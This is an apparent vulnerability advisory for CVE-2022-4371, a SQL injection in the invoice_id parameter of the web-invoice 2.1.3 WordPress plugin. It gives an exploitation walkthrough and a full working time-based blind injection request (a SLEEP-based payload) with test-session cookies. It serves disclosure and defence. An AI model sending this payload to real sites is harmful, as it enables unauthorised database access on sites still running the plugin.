web-invoice 2.1.3 (1/2) WordPress plugin SQL injection
Vulnerability Metadata
| Key | Value |
|---|---|
| Date of Disclosure | December 12 2022 |
| Affected Software | web-invoice |
| Affected Software Type | WordPress plugin |
| Version | 2.1.3 |
| Weakness | SQL Injection |
| CWE ID | CWE-89 |
| CVE ID | CVE-2022-4371 |
| CVSS 3.x Base Score | n/a |
| CVSS 2.0 Base Score | n/a |
| Reporter | Daniel Krohmer, Kunal Sharma |
| Reporter Contact | daniel.krohmer@iese.fraunhofer.de |
| Link to Affected Software | https://wordpress.org/plugins/web-invoice |
| Link to Vulnerability DB | https://nvd.nist.gov/vuln/detail/CVE-2022-4371 |
Vulnerability Description
The invoice_id query parameter in web-invoice 2.1.3 is vulnerable to to SQL injection. An authenticated attacker may abuse the new_web_invoice page of the plugin to craft a malicious GET request. Depending on the plugin settings, this attack may impact any user role (subscriber or higher).
Exploitation Guide
This exploit was tested with WordPress 4.2, since the plugin is not working on recent WordPress versions anymore.
In the plugin settings, any user role can be assigned to invoice management. In this example, we use a low-privilege Subscriber role.
Create a new invoice for an arbitrary user:
Fill out the form and submit the invoice by clicking on Save and Preview:
Go to the invoice overview by clicking on Web Invoice, then click on the subject that has just been created.
Scroll down and hit Clear Log:
Clicking the previous button triggers the vulnerable request. invoide_id is the vulnerable query parameter
A POC may look like the following request:
In the code, the vulnerability is triggered by unsanitized user input of invoice_id at line 40 in ./Flow.php.
In ./Functions.php at line 75, the parameter is passed to the function web_invoice_show_message.
In this function, the malicious database is crafted at line 503 of ./Functions.php
Exploit Payload
Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.
The SQL injection can be triggered by sending the request below.
GET /wp-admin/admin.php?page=new_web_invoice&invoice_id=31618572+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA)&web_invoice_action=clear_log HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/wp-admin/admin.php?page=new_web_invoice&web_invoice_action=doInvoice&invoice_id=31618572
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=subscriber%7C1669997060%7CQdxLUgq9Wz8z38XxdX2XGFlZGfCPfJ749H8TSkI3bVk%7C4d290f74d0fdee6ed52774b0827884c4a4ac8f0515fbe0c2ccd89c9093b52f90; wplrp_subscriber_id=6; wp_woocommerce_session_86a9106ae65537651a8e456835b316ab=1%7C%7C1669972640%7C%7C1669969040%7C%7C4e12cab99480b80c0ee581a6517239e4; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do; wp-settings-time-1=1669802217; wp-settings-time-2=1669824525; XDEBUG_SESSION=netbeans-xdebug; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=subscriber%7C1669997060%7CQdxLUgq9Wz8z38XxdX2XGFlZGfCPfJ749H8TSkI3bVk%7C7264237c5bb535f6d1e5efa1bf3cb1db26c41b5a279f134aa8004c585e6e0ee7
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1